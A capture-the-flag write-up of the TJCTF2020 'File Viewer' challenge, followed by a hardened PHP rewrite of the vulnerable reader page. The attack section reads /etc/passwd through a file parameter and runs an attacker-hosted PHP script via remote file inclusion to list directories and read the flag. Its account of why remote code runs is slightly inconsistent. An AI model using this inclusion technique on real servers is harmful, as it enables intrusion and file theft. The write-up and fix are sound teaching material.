TJCTF2020 - File Viewer

Posted on Tue. 02 June 2020 in CTF

Solves: 257

Points: 70

Written by saisree

So I've been developing this really cool site where you can read text files! It's still in beta mode, though, so there's only six files you can read.

Hint: The flag is in one directory somewhere on the server, all you have to do is find it... Oh wait. You don't have a shell, do you?

Start by visiting the website:

fileviewer.png

Clicking on one of the links, the URL becomes http://file_viewer.tjctf.org/reader.php?file=apple.txt and the page shows the content of that file.

Let's try reading another file, such as /etc/passwd: http://file_viewer.tjctf.org/reader.php?file=/etc/passwd

fileviewer_passwd.png

So the website has an LFI/RFI vulnerability: the file parameter is passed to the file-reading function without any validation, and remote URLs are accepted as well. We can therefore host a PHP script that lists the contents of the current folder. It shows a folder called i_wonder_whats_in_here. Listing that folder in turn reveals flag.php. Go read it!

<?php
    // Hosted on our own server and included through the vulnerable parameter:
    // http://file_viewer.tjctf.org/reader.php?file=http://x.x.x.x/fileviewer_rfi.php

    // list the content of the current directory (ascending, then descending order)
    $dir    = '.';
    $files1 = scandir($dir);
    $files2 = scandir($dir, 1);

    print_r($files1);
    print_r($files2);

    // read the flag file found in the listing
    echo file_get_contents('i_wonder_whats_in_here/flag.php');
?>

The flag is in the page source (file_get_contents returns the raw PHP tags, which the browser does not render, so use "view source"):

<?php
    // tjctf{n1c3_j0b_with_lf1_2_rc3}
?>
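The root cause is that reader.php hands the file parameter straight to a file-reading function, with allow_url_fopen enabled so that even remote URLs are fetched. As an added example, not the challenge's own source (the writeup never shows reader.php), here is how the page could have been written to expose only its six files; the directory name, the file names other than apple.txt and the function names are assumptions:

```php
<?php
// Hardened reader.php (added example, not the challenge's source).
// Assumptions: the six text files live in a fixed directory FILE_DIR;
// only apple.txt is known from the writeup, the other names are placeholders.
declare(strict_types=1);

const FILE_DIR = __DIR__ . '/files';   // assumed location of the readable files
const ALLOWED_FILES = [
    'apple.txt',                       // seen in the writeup
    'placeholder2.txt', 'placeholder3.txt', 'placeholder4.txt',
    'placeholder5.txt', 'placeholder6.txt',
];

// Vulnerable pattern (reconstructed from the observed behaviour, not the real source):
//     echo file_get_contents($_GET['file']);
// Any local path (/etc/passwd) or, with allow_url_fopen=On, any URL is read and echoed.

/**
 * Map the user-supplied name to an absolute path inside FILE_DIR, or null if it
 * is not one of the allowed files.
 */
function resolve_requested_file(string $name): ?string
{
    // 1. Exact-match allowlist: "../x", "/etc/passwd" and "http://..." never match.
    if (!in_array($name, ALLOWED_FILES, true)) {
        return null;
    }
    // 2. Defence in depth: canonicalise and confirm the path is still under FILE_DIR,
    //    so a symlinked or mis-configured entry cannot escape the directory.
    $base = realpath(FILE_DIR);
    $path = realpath(FILE_DIR . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// file[]=... would arrive as an array; treat anything but a plain string as missing.
$requested = $_GET['file'] ?? null;
$path = is_string($requested) ? resolve_requested_file($requested) : null;

header('Content-Type: text/plain; charset=utf-8');   // never let the browser interpret the file
if ($path === null) {
    http_response_code(404);
    echo "No such file.\n";
    exit;
}
readfile($path);
```

The allowlist alone already closes both the LFI and the RFI, since neither "/etc/passwd" nor "http://x.x.x.x/fileviewer_rfi.php" is one of the six names; the realpath check is there so that a later change to the list cannot quietly reopen a traversal. Independently of the code, setting allow_url_fopen=Off and allow_url_include=Off in php.ini means that even a regression to the vulnerable pattern can no longer pull in a remote script.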